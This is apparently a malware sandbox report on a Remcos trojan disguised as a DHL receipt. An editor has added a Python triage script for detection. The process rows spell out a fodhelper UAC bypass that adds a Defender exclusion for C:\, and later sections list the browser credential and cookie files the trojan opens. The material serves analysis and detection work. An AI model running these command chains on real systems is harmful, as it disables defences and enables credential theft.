Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\xkn.exe | Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
Source: remcos.exe, 00000005.00000002.4125282183.0000000000698000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: remcos.exe, 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerr]
Source: remcos.exe, 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4125282183.000000000069B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerK5\
Source: remcos.exe, 00000005.00000002.4125282183.0000000000698000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managere=C:
Source: remcos.exe, 00000005.00000002.4125282183.0000000000698000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager6
Source: remcos.exe, 00000005.00000002.4125282183.0000000000667000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4125282183.000000000069B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
Source: remcos.exe, 00000005.00000003.1858721908.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, logs.dat.5.dr | Binary or memory string: [Program Manager]
Source: remcos.exe, 00000005.00000002.4125282183.0000000000667000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000643000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managermcos\remcos.exe
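The Process created rows above show the whole elevation chain in plain text: extrac32 /C /Y is used to copy cmd.exe, reg.exe, powershell.exe and fodhelper.exe to renamed files (alpha.exe, ger.exe, xkn.exe, per.exe); mkdir "\\?\C:\Windows " creates a directory whose trailing space survives only because the \\?\ prefix skips Win32 path normalisation; the renamed reg.exe writes HKCU\Software\Classes\ms-settings\shell\open\command, which the auto-elevating fodhelper.exe consults, so the PowerShell copy runs Add-MpPreference -ExclusionPath C:\ at high integrity without a UAC prompt; taskkill then removes the SystemSettings.exe window that fodhelper opens. The triage script below is an added example, not Joe Sandbox code: it parses a handful of those rows (copied from the listing above, using a " | " separator between the Source and the event), tracks which renamed binary is a copy of which system tool, and flags the indicators. The function names, the tag wording and the MITRE ATT&CK mapping (T1548.002, T1562.001) are the editor's own choices.

```python
"""Triage Joe Sandbox 'Process created' rows for the fodhelper / trusted-path
UAC bypass and Defender-exclusion chain.  Added example; not Joe Sandbox code."""
import re
from collections import OrderedDict

# Constructed sample: a subset of the 'Process created' rows from this report.
SAMPLE_ROWS = r"""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
"""

# Parent, child image and command line.  The child image ends at the first
# ".exe"/".pif", so a path with an embedded space ("C:\Windows \System32")
# is kept whole.  Works with or without the " | " separator and tolerates a
# trailing "Jump to behavior" link label.
ROW_RE = re.compile(
    r"Source:\s*(?P<parent>.*?)\s*\|?\s*Process created:\s*"
    r"(?P<child>.+?\.(?:exe|pif))\s+(?P<cmd>.*?)\s*(?:Jump to behavior)?$",
    re.IGNORECASE)
# extrac32 /C /Y <source> <destination>: copies a file, no CAB needed (LOLBin).
COPY_RE = re.compile(
    r'extrac32(?:\.exe)?\s+/C\s+/Y\s+(?P<src>\S+)\s+(?P<dst>"[^"]*"|\S+)',
    re.IGNORECASE)


def norm(path):
    """Strip quotes and collapse the doubled backslashes the batch file used.
    Internal spaces are kept deliberately: 'C:\\Windows \\System32' is the point."""
    return path.strip().strip('"').replace("\\\\", "\\")


def classify(child, cmd):
    """Return indicator tags for one process-creation event (hypothetical wording)."""
    low = (child + " " + cmd).lower()
    tags = []
    if "ms-settings\\shell\\open\\command" in low:
        tags.append("T1548.002 UAC bypass: ms-settings handler hijack (fodhelper)")
    if "add-mppreference" in low and "-exclusionpath" in low:
        tags.append("T1562.001 Defender exclusion added")
    if "\\windows \\" in low:   # 'C:\Windows \System32' mock trusted directory
        tags.append("TrustedPath UAC bypass: mock 'C:\\Windows \\System32'")
    if "mkdir" in low and "\\\\?\\" in low:   # \\?\ keeps the trailing space
        tags.append("mock trusted directory created via \\\\?\\ path")
    if "taskkill" in low and "systemsettings.exe" in low:
        tags.append("SystemSettings.exe killed (hides the fodhelper launch)")
    return tags


def describe(image, copies):
    """Render 'alpha.exe (copy of cmd.exe)' when the image is a known extrac32 copy."""
    src = copies.get(norm(image).lower())
    return image if src is None else f"{image} (copy of {src.rsplit(chr(92), 1)[-1]})"


def analyze(text):
    """Parse rows, learn the renamed-binary map, and list (tag, evidence) findings."""
    copies = OrderedDict()        # lowercased destination path -> source path
    findings = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        parent, child, cmd = m.group("parent"), m.group("child"), m.group("cmd")
        c = COPY_RE.search(cmd)
        if c:
            src, dst = norm(c.group("src")), norm(c.group("dst"))
            copies[dst.lower()] = src
            findings.append(("LOLBin copy via extrac32", f"{src} -> {dst}"))
        for tag in classify(child, cmd):
            findings.append((tag, f"{describe(parent, copies)} -> {describe(child, copies)}"))
    return {"copies": copies, "findings": findings}


if __name__ == "__main__":
    result = analyze(SAMPLE_ROWS)
    for dst, src in result["copies"].items():
        print(f"renamed copy: {dst}  <=  {src}")
    for tag, evidence in result["findings"]:
        print(f"[{tag}] {evidence}")
```

Resolving the renamed copies is what makes the chain readable to an analyst who only sees alpha.exe, xkn.exe and ger.exe in process telemetry; the same map is what a Sysmon or EDR rule would have to reconstruct from the extrac32 command lines, since the copied binaries keep Microsoft's signature and pass a naive image-name allowlist.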
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA74C52 cpuid
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_028BDAA4 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_028A5A78 GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_028AA7A8 GetLocaleInfoA
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_028AA75C GetLocaleInfoA
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_028A5B84 lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_028BDAA4 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_028C5E01 GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA91CD8 IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA91F9B EnumSystemLocalesW
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA91F50 EnumSystemLocalesW
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA888ED GetLocaleInfoW
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA4F8D1 GetLocaleInfoA
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA92543 GetLocaleInfoW
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA9243C GetLocaleInfoW,GetLocaleInfoW,GetACP
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA88404 EnumSystemLocalesW
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA92610 GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA920C3 GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA92036 EnumSystemLocalesW
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA92313 GetLocaleInfoW
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5AF8D1 GetLocaleInfoA
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5F2543 GetLocaleInfoW
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5E8404 EnumSystemLocalesW
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5F243C GetLocaleInfoW,GetLocaleInfoW,GetACP
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5F1CD8 IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5F1F50 EnumSystemLocalesW
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5F1F9B EnumSystemLocalesW
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5F2610 GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5F2036 EnumSystemLocalesW
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5E88ED GetLocaleInfoW
Source: C:\ProgramData\Remcos\remcos.exe | Code function: 5_2_2D5F2313 GetLocaleInfoW
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689C51EC GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689C3140 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW
Source: C:\Users\Public\alpha.exe | Code function: 7_2_00007FF7689B6EE4 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689C51EC GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689C3140 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW
Source: C:\Users\Public\alpha.exe | Code function: 8_2_00007FF7689B6EE4 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689C51EC GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689C3140 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW
Source: C:\Users\Public\alpha.exe | Code function: 11_2_00007FF7689B6EE4 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\alpha.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\xkn.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\Public\xkn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\Public\xkn.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\Public\xkn.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\alpha.exe | Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Remcos\remcos.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_028A91A4 GetLocalTime
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA5B60D GetComputerNameExW,GetUserNameW
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_2DA893AD _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: 0_2_028AB724 GetVersionExA
Source: C:\Users\Public\xkn.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: cmdagent.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: quhlpsvc.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: avgamsvr.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: TMBMSRV.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: Vsserv.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: avgupsvc.exe
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000002.2020797857.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000029.00000002.1940219819.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 8132, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 3844, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\trhrth\logs.dat, type: DROPPED
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0_2_2DA4BA12
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 0_2_2DA4BB30
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Code function: \key3.db 0_2_2DA4BB30
Source: C:\Users\Public\alpha.exe | File opened: \\Windows \
Source: C:\ProgramData\Remcos\remcos.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\ProgramData\Remcos\remcos.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\ProgramData\Remcos\remcos.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\ProgramData\Remcos\remcos.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\ProgramData\Remcos\remcos.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\ProgramData\Remcos\remcos.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\ProgramData\Remcos\remcos.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\ProgramData\Remcos\remcos.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\ProgramData\Remcos\remcos.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\ProgramData\Remcos\remcos.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\ProgramData\Remcos\remcos.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\ProgramData\Remcos\remcos.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\ProgramData\Remcos\remcos.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\ProgramData\Remcos\remcos.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\ProgramData\Remcos\remcos.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\ProgramData\Remcos\remcos.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\ProgramData\Remcos\remcos.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: remcos.exe PID: 8144, type: MEMORYSTR

Remote Access Functionality

Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-0X3XK5
Source: C:\ProgramData\Remcos\remcos.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-0X3XK5
Source: C:\ProgramData\Remcos\remcos.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-0X3XK5
Source: C:\ProgramData\Remcos\remcos.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-0X3XK5
Source: Yara match | File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000002.2020797857.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
